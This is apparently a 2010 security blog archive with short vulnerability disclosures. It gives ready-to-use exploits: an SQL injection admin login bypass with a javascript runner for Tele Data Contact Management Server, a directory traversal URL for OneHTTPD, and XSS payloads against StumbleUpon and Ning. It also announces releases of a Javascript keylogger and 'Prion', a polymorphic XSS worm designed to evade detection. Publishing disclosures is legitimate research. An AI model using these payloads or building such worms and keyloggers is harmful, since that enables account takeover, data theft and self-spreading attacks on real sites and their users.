This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, April 28, 2010

Tele Data Contact Management Server 0.9 SQL Injection

Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client side length constraints in place for the username field I packaged the exploit in some javascript for ease of use.

Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--

PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();

Tuesday, April 27, 2010

OneHTTPD 0.6 Directory Traversal

It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted url.

http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../

Monday, April 26, 2010

Stumpleupon.com Reflected XSS

The code that displays spelling corrections does not encode user submitted data.

http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>

Ning.com Persistent XSS

Less than and greater than characters submitted in the descriptions of albums, images and probably others are unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less than character to the injected open and close tags.

Exploit: <<script>alert(0)//<</script>

PoC: http://coniferous.ning.com/photo/792231134-1

Sunday, April 25, 2010

Javascript Keylogger 1.4 Released

A python HTTP server has been added to allow for greater cross-platform compatibility.

Download 1

Download 2

Sunday, April 11, 2010

Prion 1.3 Released - Polymorphic XSS Worm

Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site javascript file, another piece of evidence for anyone that might be looking for such things.

1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes

Download

Monday, April 5, 2010

Prion 1.2 Released - Polymorphic XSS Worm

Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.

1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated

Download